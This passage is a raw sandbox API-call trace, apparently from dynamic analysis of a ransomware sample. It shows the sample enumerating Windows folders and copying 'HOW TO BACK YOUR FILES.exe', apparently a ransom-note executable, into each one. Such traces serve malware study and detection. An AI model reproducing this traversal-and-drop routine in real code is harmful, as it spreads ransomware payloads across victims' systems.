ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.465] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.465] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.466] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG" [0077.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1408 | out: hHeap=0x2b0000) returned 1 [0077.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0077.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned 56 [0077.466] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG" [0077.466] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.466] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.469] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.469] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fae9f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fae9f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.470] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.470] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.470] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA" [0077.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0077.470] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0077.470] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned 56 [0077.470] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA" [0077.470] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.470] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.473] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.473] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fae9f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fae9f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.474] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.474] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.474] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Help", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Help") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Help" [0077.474] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e47f0 | out: hHeap=0x2b0000) returned 1 [0077.474] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0077.474] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help") returned 51 [0077.474] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Help" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Help") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Help" [0077.474] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.474] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.481] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.481] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fae9f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fae9f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.482] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.482] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT" [0077.482] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0077.482] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0077.482] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned 54 [0077.482] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT" [0077.482] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.482] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.488] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.488] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fb100e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fb100e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.488] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.488] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.488] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters" [0077.489] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0077.489] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0077.489] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned 54 [0077.489] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters" [0077.489] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.489] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.492] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.492] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5fb100e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fb100e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.492] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.492] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.493] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO" [0077.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4780 | out: hHeap=0x2b0000) returned 1 [0077.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0077.493] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned 51 [0077.493] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO" [0077.493] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.493] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.498] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.498] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x58c7d970, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5fb100e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fb100e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.498] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.498] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.498] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION" [0077.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0077.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0077.498] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned 55 [0077.498] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION" [0077.498] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.498] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.545] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.545] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fb36240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fb36240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.545] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.546] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.546] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033" [0077.546] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0077.546] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0077.546] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned 60 [0077.546] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033" [0077.546] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.546] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.550] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.550] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fba8660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fba8660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.551] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.551] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.551] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\DW", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\DW" [0077.551] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0077.551] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0077.551] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned 49 [0077.551] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\DW" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\DW") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\DW" [0077.551] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.551] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.592] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.592] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51e19d30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5fc1aa80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fc1aa80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.592] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.592] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.592] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\DESIGNER", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\DESIGNER") returned="C:\\Program Files\\Common Files\\DESIGNER" [0077.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0077.592] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0077.592] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER") returned 38 [0077.592] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\DESIGNER" | out: lpString1="C:\\Program Files\\Common Files\\DESIGNER") returned="C:\\Program Files\\Common Files\\DESIGNER" [0077.592] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.592] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\DESIGNER\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\designer\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.596] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69da35f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5fc1aa80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fc1aa80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.596] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.596] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.596] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache", iMaxLength=260 | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0077.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0077.596] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0077.596] lstrlenW (lpString="C:\\MSOCache") returned 11 [0077.596] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache" | out: lpString1="C:\\MSOCache") returned="C:\\MSOCache" [0077.597] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.597] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.600] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.600] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fc1aa80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fc1aa80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.601] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.601] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.620] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users") returned="C:\\MSOCache\\All Users" [0077.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecfb0 | out: hHeap=0x2b0000) returned 1 [0077.620] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a28 | out: hHeap=0x2b0000) returned 1 [0077.620] lstrlenW (lpString="C:\\MSOCache\\All Users") returned 21 [0077.620] lstrcatW (in: lpString1="", lpString2="C:\\MSOCache\\All Users" | out: lpString1="C:\\MSOCache\\All Users") returned="C:\\MSOCache\\All Users" [0077.620] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.620] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\MSOCache\\All Users\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\msocache\\all users\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.633] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.633] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5fc66d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fc66d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0077.633] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.633] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.649] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", iMaxLength=260 | out: lpString1="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All 